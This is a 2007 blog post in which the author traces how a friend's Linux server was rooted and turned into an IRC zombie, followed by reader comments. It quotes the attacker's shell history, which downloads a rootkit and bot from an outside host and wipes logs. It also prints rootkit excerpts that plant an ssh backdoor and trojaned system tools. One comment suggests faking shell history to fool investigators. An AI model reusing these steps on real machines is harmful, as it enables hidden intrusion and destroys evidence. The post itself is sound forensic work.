Holiday cracking

Monday 09 April 2007 @ 19:17 CEST

Contributed by: lars

Update! 16. September 2007: I've posted a follow up on this story here.

A friend of mine asked me to have a look at his Linux-server. "It behaves strangely" he said, most notably the web-server apache refused to start. It turned out to be more than just a problem with apache.

I already had an account, so I started to poke around. The first thing I noticed was some strange ls behavior:

 lars@server1:~$ ls

 ls: invalid option -- h

 Try `ls --help' for more information.

That's odd.. Why don't "ls" take "-h" all of a sudden?? I had aliased "ls, so I unaliased it and it worked fine:

lars@server1:~$ alias ls

 alias ls='ls -sh --color=auto'

 lars@server1:~$ unalias ls

 lars@server1:~$ ls

 backup

 lars@server1:~$

Strange. I'll have too look into that later, but first get apache up and running:

 lars@server1:~$ sudo /etc/init.d/apache2 start

 Password:

  * Starting apache 2.0 web server...

 (2): apache2: could not open error log file /var/log/apache2/error.log.

 Unable to open logs

    ...fail!

Ookay..? A quick peek into "/var/log/" revealed that "apache2/" was missing, but so was all other directories usually found under there as "mysql/", "exim4/", "samba/" and so on. Something was wrong alright. Did my friend accidentally delete everything by mistake?? He claimed not to. I logged in as root to fix the missing directories:

 lars@server1:~$ sudo su -

 Password:

 root@server1:~# ls

 ls: unrecognized prefix: do

 ls: unparsable value for LS_COLORS environment variable

 total 44

   4 .                 4 .bashrc           4 .ssh

   4 ..                4 .lesshst          8 .viminfo

   8 .bash_history     4 .profile          4 .vimrc

Even more "ls" trouble? Again, "ls" is aliased:

 root@server1:~# alias ls

 alias ls='ls -sa --color=auto'

 root@server1:~# unalias ls

 root@server1:~# ls

 root@server1:~#

By now, I really suspected that something was very very wrong. Misbehaving "ls" and missing a bunch of stuff under "/var/log/". My suspicion was confirmed when I examined root's ".bash_history":

root@server1:~# cat -n .bash_history

   ...

   340  w

   341  cd /var

   342  wget http://83.19.148.250/~matys/pliki/shv5.tar.gz

   343  tar -zxf shv5.tar.gz

   344  rm -rf shv5.tar.gz

   345  mv shv5 .x

   346  cd .x

   347  ./setup zibi.joe.149 54098

   348  passwd

   349  passwd

   350  ps aux

   351  crontab -l

   352  cat /etc/issue

   353  cat /etc/passwd

   354  w

   355  who

   356  cd /usr/lib/libsh

   357  ls

   358  hide +

   359  chmod +x hide

   360  hide +

   361  ./hide +

   362  cd /var/.x

   363  mkdir psotnic

   364  cd psotnic

   365  wget http://83.19.148.250/~matys/pliki/psotnic0.2.5.tar.gz

   366  tar -zxf psotnic0.2.5.tar.gz

   367  rm -rf psotnic0.2.5.tar.gz

   368  ls

   369  mv psotnic-0.2.5-linux-static-ipv6 synscan

   370  ./synscan

   371  vi conf

   372  vi conf1

   373  mv synscan smbd

   374  smbd -c conf

   375  ls

   376  ps aux

   377  ls

   378  ./smbd -c conf

   379  ./smbd -c conf1

   380  ./smbd conf

   381  ./smbd conf1

   382  ./smbd -a conf conf1

   383  rm -rf conf.dec

   384  rm -rf conf1.dec

   385  cd /usr/lib/libsh

   386  ./hide +

   387  exit

   ...

   425  ssh ftp@62.101.251.166

   426  w

   427  ls

   428  ls

   429  cd /var/.x

   430  ls

   431  cd psotnic/

   432  ls

   433  rm -rf /var/log/*

   434  exit

   435  ls

   436  cd /var/.x/psotnic/

   437  ls

   438  vi conf2

   439  ./smbd -c conf2

   440  ./smbd conf2

   441  ./smbd -a conf conf1 conf2

   442  rm -rf conf2.dec

   443  cd ..

   444  ls

   445  cd /usr/lib/libsh

   446  hide +

   447  ./hide +

   448  exit

   449  ps aux

   450  cd /var/.x

   451  ls

   452  ls

   453  cd psotnic/

   454  ls

   455  cat pid.MastaH

   456  kill -9 2030

   457  ./synscan -a conf conf1

   458  ./smbd -a conf conf1

   459  cd /usr/lib/libsh

   460  ./hide +

  ...

Woha! The box had been cracked alright! I found this quite exciting, but obviously, my friend did not. The attacker did one elementary error by not wiping out ".bash_history" - so this is probably not the only error he/she has done. Let's start dissecting this little crack.

First. What is hiding under "/var/.x/" and what does the command "setup zibi.joe.149 54098" do?

root@server1:/var/.x# file setup

setup: Bourne-Again shell script text executable

root@server1:/var/.x# wc -l setup

825 setup

root@server1:/var/.x# head -17 setup

#!/bin/bash

#

# shv5-internal-release

# by: PinT[x] April/2003

# 

# greetz to:

#

# [*] SH-members: BeSo_M, grass^, toolman, nobody, niceboy, armando99 

#                 C00L|0, GolDenLord, Spike, zion ...

# [*] Alba-Hack : 2Cool, heka, TheMind, ex-THG members ...

# [*] SH-friends: mave, AlexTG, Cat|x, klex, JinkS ...

# [*] tC-members: eksol, termid, hex, keyhook, maher, tripod etc..

# [*] And all others who diserve to be here but i forgot

# [*] them at the moment !

# 

# PRIVATE ! DO NOT DISTRIBUTE *censored*EZ !

Now, this little shell script does all kinds of nasty stuff, like installing a modified ssh backdoor disguised as "/bin/ttyload" which is then added to "/etc/inittab" for automatic startup at boot:

mv $SSHDIR/sshd /sbin/ttyload

chmod a+xr /sbin/ttyload

chmod o-w /sbin/ttyload

touch -acmr /bin/ls /sbin/ttyload

chattr +isa /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

....

# INITTAB SHUFFLING

chattr -isa /etc/inittab

cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1

cat /etc/inittab |grep getty > /tmp/.init2

echo "# Loading standard ttys" >> /tmp/.init1

echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1

It also backdoor a bunch of standard linux commands:

# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup

mkdir $BACKUP

...

# ls ...

chattr -isa /bin/ls

cp /bin/ls $BACKUP

mv -f ls /bin/ls

chattr +isa /bin/ls

This explains why "ls" misbehavied!

root@server1:/var/.x# ls -l /usr/lib/libsh/.backup/

total 552

-rwxr-xr-x   1 root     root       126276 Dec 24 22:58 find

-rwxr-xr-x   1 root     root        59012 Dec 24 22:58 ifconfig

-rwxr-xr-x   1 root     root        77832 Dec 24 22:58 ls

-rwxr-xr-x   1 root     root        30388 Dec 24 22:58 md5sum

-rwxr-xr-x   1 root     root        99456 Dec 24 22:58 netstat

-rwxr-xr-x   1 root     root        65492 Dec 24 22:58 ps

-rwxr-xr-x   1 root     root        14016 Dec 24 22:58 pstree

-rwxr-xr-x   1 root     root        50180 Dec 24 22:58 top

Oh - and look at the timestamp. This was done at christmas!

Clearly the original "ls" and the newly installed "ls" are different, as md5 fingerprint and file shows:

root@server1:~# md5sum /usr/lib/libsh/.backup/ls /bin/ls

eef7ca9dd6be1cc53bac84012f8d1675  /usr/lib/libsh/.backup/ls

0a07cf554c1a74ad974416f60916b78d  /bin/ls



root@server1:~# file /bin/ls

/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked 

(uses shared libs), for GNU/Linux 2.0.0, stripped



root@server1:~# file /usr/lib/libsh/.backup/ls

/usr/lib/libsh/.backup/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked 

(uses shared libs), for GNU/Linux 2.6.0, stripped

The backdoor toolkit ("sh5.tar.gz") was downloaded from (local copy here):

root@server1:~#  dig +short -x 83.19.148.250

4lo.bydg.pl.

I can't make much out of the site, since it's in polish. The attacker probably don't have any connection to this site - I don't think he is that foolish, but then again - he has done several severe mistakes.

The output of the "setup" command, as run by the attacker, can be seen in the screen shot (I was running this on sandboxed server at home):

Okay, so "zibi.joe.149" is the password and "54098" is the port number. It's running and (old) sshd from ssh.com, as seen from the screen shot:

Nice colors.

The backdoor is installed. The next step is to install an irc-bot and make it an zombie. That is what "psotnic0.2.5.tar.gz" contains. The attacker extract and rename the irc-bot to "smbd", which happens to be the same as Samba's daemons ("smbd" and "nbmd").

Next he creates two configuration files, which contains which irc-server to connect to, and which channel to join etc. The config files are then encrypted, and the clear-text ones are deleted:

   371  vi conf

   372  vi conf1

   ....

   378  ./smbd -c conf 

   379  ./smbd -c conf1

   380  ./smbd conf

   381  ./smbd conf1

   382  ./smbd -a conf conf1

Let's execute command 382 to see what it does:

root@server1:/var/.x/psotnic# ./smbd -a conf conf1



Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)

Copyright (C) 2003-2005 Grzegorz Rusin 



[+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1

[+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1

[+] Added 2 psotnics to cron

Aha! So it gets added to cron:

root@server1:/var/.x/psotnic# crontab -l

*/10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1

*/10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1

At this time I killed off the two hostile smbd-processes and disabled the cron-job. I fired up a tcpdump in another shell and started the two processes manually:

root@server1:~# cd /var/.x/psotnic; ./smbd conf



Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)

Copyright (C) 2003-2005 Grzegorz Rusin 



[*] Acting as LEAF

[+] Config loaded

[+] Going into background [pid: 5724]

root@server1:/var/.x/psotnic# ./smbd conf1



Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49)

Copyright (C) 2003-2005 Grzegorz Rusin 



[*] Acting as LEAF

[+] Config loaded

[+] Going into background [pid: 5727]

root@server1:/var/.x/psotnic#

These two processes show up using (our backdoored) "ps", so I guess that why the attacker renamed it to "smbd":

root@server1:/var/.x/psotnic# ps axuw | grep smb

root      3799  0.0  0.4  8592 2156 ?        S    11:00   0:00 /usr/sbin/smbd -D

root      3808  0.0  0.1  8592  896 ?        S    11:00   0:00 /usr/sbin/smbd -D

root      5724  0.0  0.1  1648  772 pts/2    S    12:47   0:00 ./smbd conf

root      5727  0.0  0.1  1640  764 pts/2    S    12:47   0:00 ./smbd conf1

The first two are the real samba, the next two are the irc-bot. Let's strace it to see what it does:

root@server1:~# strace -p 5727

...

connect(3, {sa_family=AF_INET, sin_port=htons(9714), sin_addr=inet_addr("83.18.74.235")}, 16) = -1 EINPROGRESS (Operation now in progress)

...

connect(4, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("195.159.0.92")}, 16) = -1 EINPROGRESS (Operation now in progress)

So it tries to connect to IP-address 83.18.74.235 on port 9714 and 195.159.0.92 on port 6667 (this port is used for irc-servers):

root@server1:~# dig +short -x 83.18.74.235

manhattan.na.pl.

root@server1:~# dig +short -x 195.159.0.92

ircnet.irc.powertech.no.

Another polish host. The other IP-adress, "ircnet.irc.powertech.no" is a CNAME for "irc.powertech.no", a well known irc-server here in Norway.

Using the tcpdump, I identified one network-stream to irc-server irc.powertech.no. As these snippets show, they show the smbd connecting to "irc.powertech.no", and joining channel "#aik":

:irc.powertech.no 001 578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB!~op@ti231210a080-3666.bb.online.no

:irc.powertech.no 002 578PAB9NB :Your host is irc.powertech.no, running version 2.11.1p1



:578PAB9NB!~op@ti231210a080-3666.bb.online.no JOIN :#aik

:irc.powertech.no 353 578PAB9NB @ #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo 

:irc.powertech.no 366 578PAB9NB #aik :End of NAMES list.

:irc.powertech.no 352 578PAB9NB #aik ~op ti231210a080-3666.bb.online.no irc.powertech.no 578PAB9NB G :0 op - GTW

:irc.powertech.no 352 578PAB9NB #aik ~kknd ti231210a080-3666.bb.online.no irc.hitos.no kknd H :2 kknd - GTW

:irc.powertech.no 352 578PAB9NB #aik ~raider mobitech-70.max-bc.spb.ru *.dotsrc.org raider G :4 raider - GTW

:irc.powertech.no 352 578PAB9NB #aik ~brandyz mobitech-70.max-bc.spb.ru *.dotsrc.org brandyz G :4 brandyz - GTW

:irc.powertech.no 352 578PAB9NB #aik ~jpi p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp jpi G :8 jpi - GTW

:irc.powertech.no 352 578PAB9NB #aik ~conf p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp conf G :7 conf - GTW

:irc.powertech.no 352 578PAB9NB #aik ~xerkoz p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp xerkoz H :7 xerkoz - GTW

:irc.powertech.no 352 578PAB9NB #aik lm campus19.panorama.sth.ac.at *.at IpaL H :5 .LaPi.9@.IRCNet..

:irc.powertech.no 352 578PAB9NB #aik ~vvo ppp86-7.intelcom.sm *.tiscali.it vvo H :6 vvo - GTW

:irc.powertech.no 315 578PAB9NB #aik :End of WHO list.

This is just the raw network traffic of the irc-session joining channel #aik and listing all other members on that channel. I decided to join that channel myself (notice the nice underground nick: "viper42"). I was surprised not to be asked for any channel password. I guess our attacker made another bummer:

17:43 -!- viper42 [~viper42@trinity.gnist.org] has joined #aik

17:43 [Users #aik]

17:43 [ 578PAB9NL] [ conf] [ jpi ] [ raider ] [ vvo   ] 

17:43 [ brandyz  ] [ IpaL] [ kknd] [ viper42] [ xerkoz] 

17:43 -!- Irssi: #aik: Total of 10 nicks [0 ops, 0 halfops, 0 voices, 10 normal]

17:43 -!- Irssi: Join to #aik was synced in 1 secs

I found my friends server with the nick "578PAB9NB" and some other machines. These zombies are probably just waiting for the attacker to join the channel and give orders. Or perhaps the attacker already are lurking there. All have "* - GTW" at the end of their nick, except one:

17:45 [powertech] -!- IpaL [lm@campus19.panorama.sth.ac.at]

17:45 [powertech] -!-  ircname  : LaPi@IRCNet

17:45 [powertech] -!-  channels : #relaks #ping @#seks #aik @#ogame.pl 

                                  #pingwinaria #hattrick #trade #admin @#!sh 

17:45 [powertech] -!-  server   : *.at [\o\  \o/  /o/]

This is the only nick that also have joined more than one channels. Guess I've found my attacker, unless this is a decoy. (Again: The attacker can't be this stupid?!?) I guess I'll just hang around for a few days just to see if anything interesting comes up. The hostname resolves to:

$ dig +short campus19.panorama.sth.ac.at

193.170.51.84

And according to RIPE this IP-address belongs to Vienna University Computer Center. I asked them ( cert at aco net ) to take a closer look at the hostname in question and got an answer just hours later:

From: Alexander Talos via RT

To: larstra@ifi.uio.no

Subject: Cracker at campus19.panorama.sth.ac.at (193.170.51.84)  [ACOnet CERT #38603]
                                                                    
Date: Fri, 18 May 2007 18:22:43 +0200 (CEST)

Reply-To: cert@aco.net


                                   
-----BEGIN PGP SIGNED MESSAGE----- 

Hash: SHA1


                                                                        
Hej!
                                                                

                  
On Fri May 18 14:45:03 2007, larstra@ifi.uio.no wrote:



> I have been tracking down cracker which connected from

> campus19.panorama.sth.ac.at (193.170.51.84). The user, which



Ouch. panorama.sth.ac.at is a dormitory with about 4k rooms all

behind a NAT gateway - it will be very hard to get hold of the

miscreant.



This incident will, in the long run, definitely help me getting

rid of the NAT boxes in setups like that, but right now, we will 

have to make do with what we have.



> Please investigate the host in question. Perhaps is this a

> compromised host on your network acting as a jumpstation for



Sure, and even in a NATed environment, this is still possible.



Btw, you did a great job in analysing the compromised machine!



I'll let you know when I have either further questions or any

interesting results.



Cheers,



  Alexander Talos



- --

IT-Security, Universitaet Wien, ACOnet CERT

<URL:http://www.univie.ac.at/ZID/security/>

T: +43-1-4277-14351  M: +43-664-60277-14351

No luck there I'm afraid..

Oh, - and I tried to log in using ssh (on port 54098) on all zombies listed here, but no ports where open. The other zombies are probably using other ports for the ssh backdoor.

The other identified network stream, destined to "83.18.74.235" was garbled, so it's time to fire up up strace again:

root@server1:/var/.x/psotnic# strace -f ./smbd conf1 &> /root/dump.strace

As expected, this creates a lot of output. Among other things, it tries to start the irc-client *censormode*X:

[pid  7537] execve("/bin/sh", ["sh", "-c", "*censormode*X -v 2> /dev/null"]

Which fails, since *censormode*X is not installed:

[pid  7537] write(2, "sh: ", 4)         = 4

[pid  7537] write(2, "*censormode*X: not found", 17) = 17

[pid  7537] write(2, "n", 1)           = 1

[pid  7537] close(2)                    = 0

You can see some of the traffic from tcpdump in the picture below:

This was just for one of the two smbd-processes. The other connected to the same polish site, and instead of "irc.powertech.no", it connected to "irc.hitos.no", an IRC-server located in Tromsø. The same zombies are at that channel as well - guess I'll stick around there for a few days as well.

Also, what the cracker did, was to run a program called "hide" to clean entries from various log-files:

root@server1:/usr/lib/libsh# ./hide +

                Linux Hider v2.0 by mave

                enhanced by me!

[+] [Shkupi Logcleaner] Removing + from the logs........ .



[+] /var/log/messages  ... [done]



[+] /var/run/utmp      ... [done]



[+] /var/log/lastlog   ... [done]



[+] /var/log/wtmp      ... [done]



            * m i s s i o n  a c c o m p l i s h e d *



                    p.h.e.e.r  S.H.c.r.e.w



server1:/usr/lib/libsh#

So why did the attacker then wipe out "/var/log/*"? Did he not trust this tool? Did he panicked?

So the box has been compromised, backdoor installed and it's been converted to a zombie. The attacker made several mistakes allowing him to be detected:

Forgot to wipe out root's .bash_history.
Wiped out everything under "/var/log/*", including directories which several programs relied on and thereby refusing to start. Now, why did he do that? This certainly was stupid.
Changed the root-password. Another bummer. Never ever change the root-password. This surely will catch the attention of a sysadmin.
Did not password-protect the IRC-channel where all his zombies resides. Not that it doesn't matter much for us, since we would have sniffed that up as soon as the zombie tried to join the channel.
Do the attacker still hang around the same channel as all his zombies does (the LaPi-guy)? If so he's just begging to be exposed.

Severeal questions remains:

Why was the command "ssh ftp@62.101.251.166" entered? Did the attacker made a mistake in typing this command or did it serve some other purpose? The IP addres resolves to:
```
$ dig +short -x 62.101.251.166

cA6FB653E.dhcp.bluecom.no.
```
What kind of traffic goes to 83.18.74.235 (manhattan.na.pl) ?
And the most important question is, how did he get access in the first time? The server was running Ubuntu 6.06 LTS (i386) and was fairly updated. The compromised could be caused by:
- An exploit unknown to the public.
- A user accessing this server from an already compromised host. The attacker could then sniff the the password.

Trackback

Trackback URL for this entry: http://blog.larsstrand.org/trackback.php?id=HollidayCracking

C�mo convertir un servidor Linux en un Zombie from meneame.net
Via Schneier [www.schneier.com/blog/archives/2007/08/how_a_linux_ser.html] art�culo en ingl�s que muestra mediante un an�lisis forense, un atacante an�nimo convierte un servidor Linux en un zmbie a su servicio. Hay que decir que el atacante tiene m�s p... [read more]
Tracked on Thursday 16 August 2007 @ 21:08 CEST

Analysis of a cracked Linux host from Basically Tech
This is a fascinating analysis of a cracked Linux host. The cracker seems to have made a number of fundamental mistakes which led to the owner becoming concerned as to why some services weren't running. The owner then called in a friend (the author) w [read more]
Tracked on Saturday 18 August 2007 @ 22:59 CEST

Undersökning av hackad linuxserver from Olle Lindgren
Jag tycker egentligen inte att l�nkar �r ett s�rskilt bra s�tt att blogga p� men jag st�tte p� denna... [read more]
Tracked on Friday 24 August 2007 @ 15:28 CEST

Adam’s R&R » Random Geekery
Tracked on Friday 24 August 2007 @ 22:20 CEST

Metagg is tracking this post from Metagg
Find out what Social News Sites are discussing this post over at metagg.com [read more]
Tracked on Friday 24 August 2007 @ 23:24 CEST

holiday cracking at random
Tracked on Saturday 25 August 2007 @ 15:55 CEST

(A lot of holiday) Week's Links from Alessandro "jekil" Tanasi blog
X-morphic ExploitationSkype's Protection Is LimitedStudent cracks Government's $84m porn filterCatching hook based keyloggers using IceSwordCore GRASP - SQL injection prevention for PHPInterview with National Intelligence Director Mike McConnellFeds use r [read more]
Tracked on Wednesday 29 August 2007 @ 00:34 CEST

Holliday Cracking - masuran.org
Tracked on Monday 08 October 2007 @ 15:11 CEST

Easy Linux Security from David Della Vecchia
Easy Linux Security [read more]
Tracked on Thursday 12 February 2009 @ 22:53 CET

Holiday cracking | 80 comments | Create New Account

The following comments are owned by whomever posted them. This site is not responsible for what they say.

Holliday cracking

Authored by: Anonymous on Wednesday 11 April 2007 @ 15:37 CEST

Good article, Lars.

It's always interesting to see how the scriptkiddies are doing nowadays. Perhaps I should blow the dust off my honeypot plans.

[ # ]

Holliday cracking - Authored by: Anonymous on Thursday 19 July 2007 @ 22:24 CEST

Holliday cracking - Authored by: Anonymous on Tuesday 21 August 2007 @ 09:02 CEST

Authored by: Anonymous on Tuesday 19 June 2007 @ 10:15 CEST

Interesting. I would go for the weak root-password-conspiration for why he could compromize it.

Holliday cracking - Authored by: Anonymous on Thursday 16 August 2007 @ 22:08 CEST

Authored by: Anonymous on Tuesday 03 July 2007 @ 19:32 CEST

Thanks for the info! You were not the first Google hit, but you were close up there, and you made the suspicions I had all the stronger. While my cracker used a different methodology than yours, it was still the same rootkit. (Fortunately, also like yours, he failed to hide his tracks worth a damn.) For some reason, he must have created an account and then deleted it, because every file he touched was owned by UID 122. No, it's not suspicios -at all- when an "ls -al" shows UIDs instead of usernames. ;-) So I'm pretty sure I've found all the infected files and processes, thank goodness. (I'll regen the box if I have to, but I'd prefer not.)

So, again, thanks -- you started me out down the path I needed to find...

-Ken

Holliday cracking - Authored by: Anonymous on Saturday 18 August 2007 @ 07:53 CEST

Holliday cracking - Authored by: Anonymous on Thursday 13 September 2007 @ 02:51 CEST

Authored by: Anonymous on Thursday 12 July 2007 @ 02:39 CEST

Without the logs you may never know how it was compromised. Was the server running denyhosts? If not, a brute force ssh attack is possible. My web server was getting about 30k-40k breaking attempts a day. Denyhosts cut that to about 300-1000 a day (of course, I have several hundred entries in my hosts.deny at any given time now...). You may want to consider syslogging to an additional box (with a different password!). Just add the following to your /etc/syslog.conf:

*.* @remote_host

Replace "remote-host" with the name or ip of your logging host. If you really want to be slick, put in a dummy host and have your logging host sniff the network traffic to get the log info.

Holliday cracking - Authored by: Anonymous on Friday 17 August 2007 @ 05:24 CEST

Holliday cracking - Authored by: Anonymous on Friday 24 August 2007 @ 23:29 CEST

Authored by: Anonymous on Thursday 12 July 2007 @ 04:53 CEST

I speak polish.
4lo.bydg.pl belongs to a high school in Bydgoszcz, Poland.
If you need any help contact me at piotr at mitc ca.

Authored by: Anonymous on Friday 13 July 2007 @ 02:46 CEST

Good article and good forensic work on the computer, Lars

Don't know if this is any help, but

Why was the command "ssh ftp@62.101.251.166" entered?
Looks like he/she want to get onto that server as user 'ftp' maybe to read some documents, maybe they were having trouble initially to get it started.

What kind of traffic goes to 83.18.74.235?
It looks encrypted traffic, and from this article on Wikipedia (http://en.wikipedia.org/wiki/Psotnic) I would guess, it was encrypted as Blowfish and talking to another bot (maybe the MasterBot, that controls all) or maybe it was encrypted connection to them?

HTH

Authored by: Anonymous on Friday 13 July 2007 @ 05:06 CEST

With the SSH command, the cracker was logging into another computer using the user 'FTP'. Maybe this was how this computer was attacked in the first place. I am only guessing since the log files were destroyed, but maybe it is an avenue to check out.

Authored by: Anonymous on Friday 13 July 2007 @ 18:54 CEST

I've seen a very similar type of attack before on a server I used to administer years ago... my exploit was caused by an unpatched php-nuke (or post-nuke), which allowed a http remote exploit to get a root prompt and it in turn ran a script kiddie on the box. I didn't bother contacting offending IP addresses as you did, but I "stepped through" the code and the similarities are remarkable (sloppily removed logs, connected to IRC, didn't remove bash_history, etc.). It would be somewhat more scary if the script wasn't quite so sloppy... For the record, I eventually did move away from the exploit issue by scrapping post-nuke and php-nuke. -- Dallas

Authored by: Anonymous on Thursday 16 August 2007 @ 22:43 CEST

At this point I would recommend you to investigate the deleted files with sleuthkit or similar program to get some more info.

Deleted files usually helps you a lot on intentions and short time usage purpose of the cracked box.

Emre

Holliday cracking - Authored by: Anonymous on Friday 17 August 2007 @ 00:19 CEST

Authored by: Anonymous on Friday 17 August 2007 @ 02:09 CEST

owned by an amateur.

Authored by: Anonymous on Friday 17 August 2007 @ 05:23 CEST

You have much to learn.
sudo su -? sudo(1) will tell you to do a sudo -s
tcpdumping and stracing? Why not use netstat to find the connections? Oh, and lsof(1) exists.
And why are you running all this on a compromised system that is still working, you fool? Pull the plug first!

Oh, I forgot - have you called the police yet? Seems not, because the urls of the cracker are still working.

Holliday cracking - Authored by: Anonymous on Friday 17 August 2007 @ 07:59 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 03:35 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 06:15 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 08:33 CEST

Authored by: Anonymous on Friday 17 August 2007 @ 10:22 CEST

Ubuntu have ssh access enabled by default.
If the root password is weak, then the first access is by brute force attack to sshd daemon.

Holliday cracking - Authored by: Anonymous on Friday 17 August 2007 @ 10:48 CEST

Holliday cracking - Authored by: Anonymous on Saturday 18 August 2007 @ 06:40 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 08:35 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 16:14 CEST

Holliday cracking - Authored by: Anonymous on Monday 27 August 2007 @ 11:17 CEST

Authored by: Anonymous on Friday 17 August 2007 @ 20:48 CEST

An interesting story, let us know if you answer some of those questions. Once the machine has been compromised, you can't trust it. You *have* to reinstall it. You can never be sure that it's trustworthy again.

Authored by: Anonymous on Saturday 18 August 2007 @ 04:31 CEST

Great work!

Anyway, as someone tolds you, you shouldn't do the forensic test in a compromised box. They can erase the information that you use to catch them while you are still looking for.

But again, is a really nice job what you've done there.

Authored by: Anonymous on Saturday 18 August 2007 @ 14:30 CEST

To anyone else reading this who hosts servers and is worried about getting attacked, i use http://www.ossec.net/ which is effectively a self defence program.
if you try and brute force (more than n attempts in p seconds) or portscan my machine, it simply locks you out for 24 hours by denying that IP.
It has other useful features and even lets me know when it's being attacked - absolutely brilliant program and i have no hesitation in recommending it.

Chkrootkit is also useful if you think you've been compromised. I've successfully repaired a machine using this tool - ended up reinstalling everything from ps to ls to netstat (the compromised version of which was not showing the remote connections...)

Holliday cracking - Authored by: Anonymous on Friday 24 August 2007 @ 22:10 CEST

Authored by: Anonymous on Friday 24 August 2007 @ 22:08 CEST

Two simple lines to run at boot:

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set &

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 -j DROP &

Lockout after four attempts through SSH - had been a boon for me.

ftp command - Authored by: Anonymous on Friday 24 August 2007 @ 23:49 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 02:56 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 07:50 CEST

Authored by: Anonymous on Friday 24 August 2007 @ 23:50 CEST

Sorry for the dupe, but if the ls and smdb commands had already been overwritten, was there a chance that ftp was as well?

Authored by: Anonymous on Saturday 25 August 2007 @ 00:03 CEST

If you need to have SSH open to the world, in addition to using something like denyhosts/ossec/iptables rules, you should relocate the listening port to something high. Very few script kiddies are going to scan all 65K+ ports of all the boxes they find looking for a SSH daemon. SSH connection attempts on my boxes went from thousands a day to virtually zero.

Holliday cracking - Authored by: Anonymous on Monday 17 September 2007 @ 10:36 CEST

Holliday cracking - Authored by: Anonymous on Friday 01 February 2008 @ 04:25 CET

Similar attack

Authored by: Anonymous on Saturday 25 August 2007 @ 01:37 CEST

A server I handle got hit with a similar attack a while back. I discovered it when I tried to connect via ssh to the server and was notified that the key had changed. Lesson 1: do not ignore messages like that. Turns out the attacker got in through a user account where the user had used her user name (a common regular name) as her password. Lesson 2: Run a password strength checker.

I ended up grabbing a fresh machine and copying the data over, being careful not to expose passwords and such. I also compared data against backups in order to ensure that the data itself didn't have any lingering traces of the crack. The funniest (though scary also) thing about the whole incident, the cracker (who was obviously an unsophisticated script kiddie) simply cracked the box to use as a zombie, totally missing the fact that it was a CVS server that contained the full source code of all the products of a consumer electronics manufacturer. Good thing most of them are sloppy and stupid.

Ubuntu 6.06 LTS

Authored by: Anonymous on Saturday 25 August 2007 @ 02:23 CEST

This is the 3rd case I know of where 6.06 LTS was cracked. One of them was my server (which happened to have strong passwords) and the other crack was mentioned in an article I ran across a few months back (sorry I can't remember well enough to find it and link to it).

The break on my system was evident due to the /var/log/ directory being wiped clean. Some shell commands we're fried also. I instantly unplugged the ethernet and poked around. No damage was done to important data, so maybe it was just setup as a bot.

I'm suspecting that the breach was due to someone, somehow getting a password. At the time I had to use windows at my work place and I often SSH'd with putty into my server. Winblows certainly could have had a keylogger on it.

The only other explanation is that someone had found and kept secret an SSH exploit. Possible but unlikely.

Ubuntu 6.06 LTS - Authored by: Anonymous on Saturday 25 August 2007 @ 03:41 CEST

Ubuntu 6.06 LTS - Authored by: Anonymous on Saturday 25 August 2007 @ 13:08 CEST

Ubuntu 6.06 LTS - Authored by: Anonymous on Tuesday 28 August 2007 @ 20:09 CEST

Authored by: Anonymous on Saturday 25 August 2007 @ 03:35 CEST

nice work, great read

Authored by: Anonymous on Saturday 25 August 2007 @ 03:50 CEST

I'm amazed on how poorly writen that rootkit is. And I'm amazed how bad the cracker actualy is. Not bad as in mean or evil, but bad as in slopy. And, imagine how many hosts are like that on the net? I'd realy love to know how he got in in the first place. Do you think that maybe your friend had something to do with it, indirectly?

And then, imagine what a professional cracker would do. I mean, ls that doesn't work well? :)

There, again, people KEEP AN EYE ON YOUR LOG FILES! Do print them, as they appear, it's the only way to know if anything changed in them.

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 14:31 CEST

Authored by: Anonymous on Saturday 25 August 2007 @ 03:57 CEST

In the name of all that is holey read Dead Linux machines Do tell tales from sans.org.

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 05:00 CEST

Holliday cracking - Authored by: Anonymous on Saturday 25 August 2007 @ 11:30 CEST

Holliday cracking - Authored by: Anonymous on Sunday 26 August 2007 @ 23:06 CEST

.bash_history

Authored by: Anonymous on Saturday 25 August 2007 @ 05:32 CEST

I've never done any kind of cracking, know next to nothing about it and hardly anything about protecting against it, but after seeing this page I know that there's one really easy way to throw a lot of people off your trail: don't wipe the .bash_history, replace it with a fake one.

.bash_history - Authored by: Anonymous on Saturday 25 August 2007 @ 08:04 CEST

.bash_history - Authored by: Anonymous on Sunday 26 August 2007 @ 10:00 CEST

.bash_history - Authored by: Anonymous on Wednesday 29 August 2007 @ 04:32 CEST

